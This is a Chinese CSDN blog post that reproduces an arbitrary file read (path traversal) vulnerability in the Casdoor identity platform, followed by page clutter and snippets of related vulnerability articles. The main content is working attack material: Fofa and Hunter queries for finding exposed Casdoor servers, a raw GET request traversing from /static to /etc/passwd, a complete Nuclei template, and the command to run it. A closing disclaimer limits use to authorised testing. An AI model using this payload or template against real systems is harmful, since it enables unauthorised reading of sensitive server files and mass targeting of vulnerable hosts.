【漏洞复现】Casdoor-任意文件读取

最新推荐文章于 2024-06-25 14:50:54 发布
最新推荐文章于 2024-06-25 14:50:54 发布
阅读量357 收藏 4
点赞数 4
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/137270183
版权

【漏洞介绍】

Casdoor系统static存在任意文件读取漏洞

【漏洞描述】
Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。

【资产测绘Query】

Fofa:title:”Casdoor”
Hunter:web.title=”Casdoor”

【漏洞复现】

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1

图片


【Nuclei-Poc】

id: template-id

info:
  name: Template Name
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |+
        GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - root
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0"

【验证】

nuclei.exe -duc -u http://target.com -t C:\Users\xxx\nuclei-templates\Casdoor-demo.yaml -debug

图片

 声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

免费领取安全学习资料包!


渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

黑客大佬
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Casdoor系统static任意文件读取漏洞
薛定谔嘚喵博客
10-07 265
Casdoor系统 static 存在任意文件读取漏洞,攻击者可利用该漏洞获取服务器上的敏感文件
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
【春秋云镜】CVE-2022-24124 Casdoor api get-oraganizations SQL注入漏洞 解题思路
Dark-Specter的博客
12-19 978
报错注入的原理是利用应用程序在处理用户输入时存在漏洞,攻击者通过巧妙构造的恶意输入,触发应用程序执行包含SQL查询的操作,并故意引发数据库系统的错误,以从错误消息中获取敏感信息。:应用程序通常允许用户在表单字段、URL参数或其他输入方式中提供数据,这些数据将用于构建SQL查询。如果应用程序未正确验证和处理用户输入,就有可能存在漏洞。:攻击者利用这个漏洞,构造恶意输入,将恶意SQL代码插入到用户输入中,这个恶意SQL代码将成为应用程序生成的SQL查询的一部分。:攻击者的恶意输入旨在触发SQL查询中的错误。
漏洞检查项)| 任意文件读取漏洞 file-read
最新发布
Da1NtY的博客
06-25 202
存在文件读取的地方,通过修改文件路径来读取敏感文件
任意文件读取漏洞
qq_51802152的博客
12-12 482
任意文件读取
Web漏洞-任意文件读取漏洞
Ays.Ie的博客
03-13 2506
该篇记录了Web漏洞-任意文件读取漏洞
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
101web漏洞挖掘之任意文件读取漏洞1
08-03
1. 读取程序源代码(如密码配置文件) 2. 读取程序配置文件(如数据库连接文件) 5. 读取中间件配置文件(weblogic/tomcat等密码文件,apac
Adminer≤4.6.2任意文件读取漏洞1
08-03
【Adminer≤4.6.2任意文件读取漏洞详解】 Adminer是一款功能强大的Web数据库管理工具,它支持多种主流数据库系统,如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,与phpMyAdmin类似。由于其轻量级的特性,只需一个...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
任意文件读取/下载漏洞
qq_68163788的博客
05-23 2616
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
【WEB漏洞原理】任意文件读取漏洞
过期的秋刀鱼
08-31 1190
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。任意文件读取会造成(敏感)信息泄露;任意文件读取大多数情况是由于其他漏洞引发的,如RCE、目录遍历、文件包含等。任意文件读取任意文件下载本质上没有区别,信息都是从服务端流向浏览器的。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
任意文件读取下载漏洞
weixin_48712514的博客
05-19 1575
1. 任意文件读取 一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。 1:敏感信息泄露 2:目录穿越,目录穿透,目录遍历 任意文件读取与下载漏洞原理 1:从权限的角度来讲,读取与下载都是属于读权限 漏洞成因 不管是任意文件读取还是任意文件下载,触发漏洞的条件都是相同的 1:存在读取文件的函数(web应用开放了读取功能) 2:读取文件的路径客户端可控(完全控制) 3:没有对文件
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 8774
文件读取漏洞文件下载漏洞文件包含漏洞三者结合,靶场练习
Jetty WEB-INF文件读取漏洞怎么修复
05-21
Jetty WEB-INF 文件读取漏洞是指攻击者可以通过构造特定的 URL 访问应用程序内部的 WEB-INF 目录中的文件,从而获取敏感信息或者执行恶意操作的漏洞。修复该漏洞可以采取以下措施: 1. 在 Web 应用程序中添加一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值